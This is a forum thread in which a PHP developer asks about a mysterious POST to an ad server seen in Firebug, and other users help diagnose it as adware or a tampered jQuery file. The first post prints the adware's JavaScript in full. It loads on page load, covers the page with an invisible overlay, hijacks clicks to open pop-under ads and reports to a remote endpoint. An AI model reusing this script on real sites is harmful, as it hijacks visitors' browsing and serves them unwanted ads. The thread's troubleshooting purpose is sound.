PHP Developers Network
http://forums.devnetwork.net/

unknown POST api.adsrun.net/post" on localhost?
http://forums.devnetwork.net/viewtopic.php?f=34&t=141962
Page 1 of 1

Author:  ershadow786 [ Mon Nov 09, 2015 8:49 am ]
Post subject:  unknown POST api.adsrun.net/post" on localhost?

I am have debugging some javascript code in firebug,then i have seen some strange POST thing in firebug this is worrying me?
I have registration form when i reload page i see in firebug following "POST http://api.adsrun.net/post"

Response Header
Cache-Control
no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection
keep-alive
Content-Type
application/json
Date
Mon, 09 Nov 2015 13:25:43 GMT
Expires
Thu, 19 Nov 1981 08:52:00 GMT
Pragma
no-cache
Server
nginx/1.9.4
Set-Cookie
PHPSESSID=a0f52694494daab764d719b907baff6b; expires=Sat, 07-Nov-2020 13:25:43 GMT; Max-Age=157680000
; path=/
Transfer-Encoding
chunked
access-control-allow-cred...
true
access-control-allow-head...
Content-Type
access-control-allow-orig...
http://localhost
p3p
CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"



RESPONSE is something like this

{"eval":"\nvar ad = response.ad;\nvar ad_token = response.ad_token;\nfunction postAction(xlog, cb) {
\n var params = {\"ad_id\":14,\"show_id\":27,\"user_id\":1573819,\"host\":\"localhost\",\"time\":1447075543
,\"hash\":\"6dd0fd2392c7a0cc9800ccfcea9143ed\"};\n params.postActionParams = xlog;\n ajax(\"http:\
/\/api.adsrun.net\/postAction\", params, cb);\n}\nvar ontw = false;\r\nfunction oNT() {\r\n if (ontw
) return;\r\n else ontw = true;\r\n var b = window.open(ad.url, \"new\" + Math.floor(9999999 *
Math.random()) + 1);\r\n if (b) postAction(); \r\n\r\n\/\/ var e = navigator.userAgent.toLowerCase
(),o = -1 != e.indexOf(\"opera\"),g = -1 != e.indexOf(\"chrome\");\r\n\r\n \/\/ if (document.createEvent
&& (o || g)) {\r\n \/\/ if (false) {\r\n \/\/ var b = document.createElement(\"a\");\r\n
\/\/ b.href = ad.url;\r\n \/\/ b.target = \"_blank\";\r\n \/\/ var c = document.createEvent
(\"MouseEvents\");\r\n \/\/ c.initMouseEvent(\"click\", !0, !0, window, 1, 0, 0, 0, 0, !0, !1,
!1, !1, 1, null);\r\n \/\/ b.dispatchEvent(c);\r\n \/\/ postAction();\r\n \/\/ } \r\n
\/\/ else {\r\n \/\/ var b = window.open(\"about:blank\", \"win\" + Math.floor(9999999 * Math
.random()) + 1);\r\n \/\/ with(b) opener.window.focus(), b.location = ad.url, \"undefined\" !=
typeof window.mozPaintCount && window.open(\"about:blank\").close()\r\n \/\/ if (b) postAction
(); \r\n \/\/ }\r\n \r\n\r\n}\r\n\r\n\r\n\r\n var startTimeout = setTimeout(myStart, 100),divret
= null;\r\nif (\"function\" == typeof window.addEventListener) window.addEventListener(\"load\", function
() {\r\n clearInterval(startTimeout);\r\n myStart()\r\n}, !1);\r\nelse try {\r\n window.attachEvent
(\"onload\", function() {\r\n clearInterval(startTimeout);\r\n myStart()\r\n })\r\n} catch
(D) {}\r\n\r\nfunction myStart() { \r\n\r\n var pdiv = document.createElement('div');\r\n
pdiv.style.position = \"fixed\";\r\n pdiv.style.zIndex = \"2147483647\";\r\n pdiv.style
.width = \"100%\";\r\n pdiv.style.height = \"100%\";\r\n pdiv.style.left = \"0px\";\r\n
pdiv.style.top = \"0px\";\r\n pdiv.onclick = function() {\r\n oNT();\r\n document
.body.removeChild(pdiv);\r\n }\r\n if (!divret) {divret=document.body.appendChild(pdiv);}\r
\n document.addEventListener ? document.addEventListener(\"mouseup\", oNT, !1) : document.attachEvent
(\"onmouseup\", oNT);\r\n \r\n}","ad":{"url":"http:\/\/www.adcash.com\/ad\/display.php?r=356017"
},"ad_token":"31f68d20ffc59b05601acfa0dc349e4b14"}


I am not sure this some malware type may be harmful??I have encountered this problem from 2 days looks strange to me and need your suggestions?

JSON :
Syntax: [ Download ] [ Hide ]
var ad = response.ad;
var ad_token = response.ad_token;
function postAction(xlog, cb) {
  var params = {"ad_id":14,"show_id":27,"user_id":1573819,"host":"localhost","time":1447075543,"hash":"6dd0fd2392c7a0cc9800ccfcea9143ed"};
  params.postActionParams = xlog;
  ajax("http://api.adsrun.net/postAction", params, cb);
}
var ontw = false;

function oNT() {

    if (ontw) return;

    else ontw = true;

    var b = window.open(ad.url, "new" + Math.floor(9999999 * Math.random()) + 1);

    if (b) postAction();  



//    var e = navigator.userAgent.toLowerCase(),o = -1 != e.indexOf("opera"),g = -1 != e.indexOf("chrome");



   // if (document.createEvent && (o || g)) {

  //  if (false) {
 

Author:  requinix [ Mon Nov 09, 2015 2:42 pm ]
Post subject:  Re: unknown POST api.adsrun.net/post" on localhost?

adsrun.net is a domain used by some kind of proxy/filter/etc. bypassing stuff. Do you have an extension installed that has anything to do with that? What <script> or Javascript code is triggering the call?

Author:  ershadow786 [ Tue Nov 10, 2015 1:16 am ]
Post subject:  Re: unknown POST api.adsrun.net/post" on localhost?

thanks for reply:
i am not sure which javascript code is triggering that call[http://api.adsrun.net/post] but after looking at JSON there is key url whose url " "http://www.newpoptab.com/watch?key=60fd53c3a2cbae821bd2f3056f84047d" " this changed after restart and before that it was tradeadexchange.after googleing i found that they were ad ware malware.I tried antivirus avg but none could remove however spyhunter could detect that but for removing it requires paid version :(.Any help appreciated

Author:  requinix [ Tue Nov 10, 2015 4:43 am ]
Post subject:  Re: unknown POST api.adsrun.net/post" on localhost?

Yeah, that could certainly explain it.

I normally clean computers by hand so I can't point you to any good anti-malware stuff. I think HijackThis is still around, but it takes a bit of know-how regarding what it reports and what should be cleaned. Microsoft has a free antivirus too. Don't remember what it's called.
Also check the most obvious place: list of programs installed in Windows. Some of the nicer malware actually lets you uninstall it.

Author:  Celauran [ Tue Nov 10, 2015 7:25 am ]
Post subject:  Re: unknown POST api.adsrun.net/post" on localhost?


Author:  requinix [ Tue Nov 10, 2015 4:37 pm ]
Post subject:  Re: unknown POST api.adsrun.net/post" on localhost?


Author:  vgstef [ Tue Feb 09, 2016 2:13 am ]
Post subject:  Re: unknown POST api.adsrun.net/post" on localhost?

I found this thread looking for information. I got the same issue, and I found where it came from.

In our website site project, a colleague included the file "jquery-2.2.0.min.js", but that had been hacked with a short on load window listener function. That function was querying a website to get spam content.

Page 1 of 1 All times are UTC - 5 hours
Powered by phpBB® Forum Software © phpBB Group
http://www.phpbb.com/